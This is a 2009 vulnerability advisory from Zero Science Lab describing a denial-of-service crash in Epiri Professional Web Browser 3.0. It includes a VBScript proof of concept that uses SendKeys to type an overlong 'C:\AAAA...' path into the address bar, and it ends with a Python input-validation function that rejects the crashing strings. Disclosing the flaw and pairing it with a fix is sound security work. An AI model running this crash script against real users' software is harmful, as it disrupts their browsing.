Title: Epiri Professional Web Browser 3.0 Remote Crash Exploit
Advisory ID: ZSL-2009-4923
Release Date: 30.07.2009
Epiri Professional 3.0 next generation alternative internet Epiri Professional features with faster internet, digital clarity, the latest technological design and user-focused, impressive, next generation alternative internet program. Microsoft Silverlight needed.
Epiri Professional Web Browser suffers from a denial of service vulnerability: the application crashes when one of the 3 vulnerable strings ('file://', 'C::' and 'C:\AAAA...AAAA') is typed into the address bar, or when a malicious .vbs script file is opened locally or remotely. Vulnerable Mode: Browse Internet.
Horizon Software Co. - <http://www.horizonum.com>
Microsoft Windows XP Professional SP3 (English)
[30.07.2009] - Initial release
Zero Science Lab
' Title: Epiri Professional Web Browser 3.0 Remote Crash Exploit
' Vendor: Horizon
' Product Web Page: http://www.horizonum.com/
' Current Version: 3.0.0.00
' Note: Microsoft Silverlight
' Vulnerable Mode: Browse Internet
' Tested On Microsoft Windows XP Professional SP3 (En)
' Vulnerable strings:
'     file://
'     C::
'     C:\AAAA...AAAA
'
' Vulnerability Discovered By Gjoko 'LiquidWorm' Krstic
' liquidworm gmail com
' http://www.zeroscience.org/
' 28.07.2009
' Working PoC: http://zeroscience.org/codes/epiri_crash.vbs

Dim crash
Set crash = CreateObject("WScript.Shell")
With crash
    Do Until Success = True
        Success = crash.AppActivate("Epiri Professional 3.0")
    Loop
    '.SendKeys "file://"
    '.SendKeys "C::"
    .SendKeys "C:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    .SendKeys "~" 'Return
End With
Wscript.Quit
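The advisory does not identify the root cause of the crash. The following is an added example, not code from Zero Science Lab or the vendor, of a pre-navigation check that rejects the three strings listed above before they reach path or URI handling. The function names, limits and rejection rules are assumptions.

```python
import re
from urllib.parse import urlsplit

MAX_PATH = 260          # classic Win32 path limit, including the terminating NUL
MAX_COMPONENT = 255     # longest single file or directory name on NTFS
DRIVE_PATH = re.compile(r"^[A-Za-z]:[\\/]")   # drive letter, colon, separator
DRIVE_PREFIX = re.compile(r"^[A-Za-z]:")      # anything that starts like a drive


def check_windows_path(path):
    """Validate a local drive path without touching the file system."""
    if not DRIVE_PATH.match(path):
        return False, "malformed drive specification"
    if len(path) >= MAX_PATH:
        return False, "path exceeds MAX_PATH"
    parts = [p for p in re.split(r"[\\/]", path[3:]) if p]
    if any(len(p) > MAX_COMPONENT for p in parts):
        return False, "path component too long"
    if any(c in p for p in parts for c in '<>:"|?*'):
        return False, "illegal character in path"
    return True, "local path"


def check_address_input(text):
    """Return (allowed, reason) for a string typed into the address bar."""
    text = text.strip()
    if not text:
        return False, "empty input"
    if DRIVE_PREFIX.match(text):            # covers the C:: and C:\AAAA... cases
        return check_windows_path(text)
    try:
        parts = urlsplit(text)
    except ValueError:                      # the check itself must never crash
        return False, "unparseable URL"
    scheme = parts.scheme.lower()
    if scheme == "file":
        local = parts.path.lstrip("/")
        if parts.netloc or not local:       # bare file:// carries no path at all
            return False, "file URI without a local drive path"
        return check_windows_path(local.replace("/", "\\"))
    if scheme in ("http", "https") and parts.netloc:
        return True, "web URL"
    return False, "unsupported or incomplete URL"
```
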